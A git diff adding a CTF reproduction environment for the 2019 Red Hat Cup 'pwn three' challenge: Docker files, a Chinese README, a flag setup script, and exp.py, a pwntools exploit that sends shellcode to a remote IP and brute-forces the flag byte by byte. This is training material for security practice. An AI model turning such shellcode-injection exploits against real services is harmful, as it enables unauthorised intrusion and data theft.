diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..2ed3f9d
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,8 @@
+FROM ctftraining/base_pwn_xinetd
+
+COPY _files/flag.sh /flag.sh
+COPY src/pwn /home/ctf/pwn
+
+RUN chown root:ctf /home/ctf/pwn && \
+    chmod 750 /home/ctf/pwn && \
+    apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..d295657
--- /dev/null
+++ b/README.md
@@ -0,0 +1,22 @@
+# 2019红帽杯 pwn three
+
+## 题目详情
+
+- **Redhat_2019_pwn_three**
+- **shellcode**
+
+## 考点
+
+- shellcode
+- 爆破
+
+## 启动
+
+```
+docker-compose up -d
+nc 127.0.0.1 10001
+```
+
+## 版权
+
+该题目复现环境尚未取得主办方及出题人相关授权，如果侵权，请联系本人删除（ alkaid.ginkgo@gmail.com）
\ No newline at end of file
diff --git a/_files/flag.sh b/_files/flag.sh
new file mode 100644
index 0000000..7c9f327
--- /dev/null
+++ b/_files/flag.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+echo $FLAG > /home/ctf/flag
+
+chmod 444 /home/ctf/flag
+
+export FLAG=not_flag
+FLAG=not_flag
+
+rm -f /flag.sh
\ No newline at end of file
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..0fcc9c6
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,15 @@
+version: "2"
+services:
+  
+  pwn:
+    build:
+      context: .
+      dockerfile: Dockerfile
+    image: ctftraining/suctf_2019_pwn_oldpc
+    volumes:
+      - ./tcpdump:/var/lib/tcpdump
+    ports:
+      - "10001:10000"
+    environment:
+      - FLAG=ctftraining{welcome_to_ctftraining}
+      - TCPDUMP_ENABLE=0
diff --git a/exp.py b/exp.py
new file mode 100644
index 0000000..29d7f44
--- /dev/null
+++ b/exp.py
@@ -0,0 +1,30 @@
+from pwn import *
+#p=process("./pwn")
+
+def create(index,content):
+	p=remote("47.104.190.38", 12001)
+	p.sendlineafter("Give me a index:\n",str(index))
+	shellcode = asm("mov eax,dword ptr[ecx];ret")
+	p.sendafter("Three is good number,I like it very much!\n",shellcode)
+	p.sendlineafter('Leave you name of size:\n','2')
+	p.sendafter("Tell me:\n",p8(content))
+	tmp= p.recvuntil('\n')
+	p.close()
+	if '1' in tmp:
+		print 'yes'
+		return True
+	else:
+		return False
+
+idx=0
+flag=''
+while "}" not in flag:
+	for i in range(256):
+		b=create(idx,i)
+		if b:
+			idx+=1
+			flag+=chr(i)
+			print flag
+			break;
+print flag
+p.interactive()
\ No newline at end of file
diff --git a/src/pwn b/src/pwn
new file mode 100644
index 0000000..9c8edb0
Binary files /dev/null and b/src/pwn differ
diff --git a/tcpdump/.gitkeep b/tcpdump/.gitkeep
new file mode 100644
index 0000000..e69de29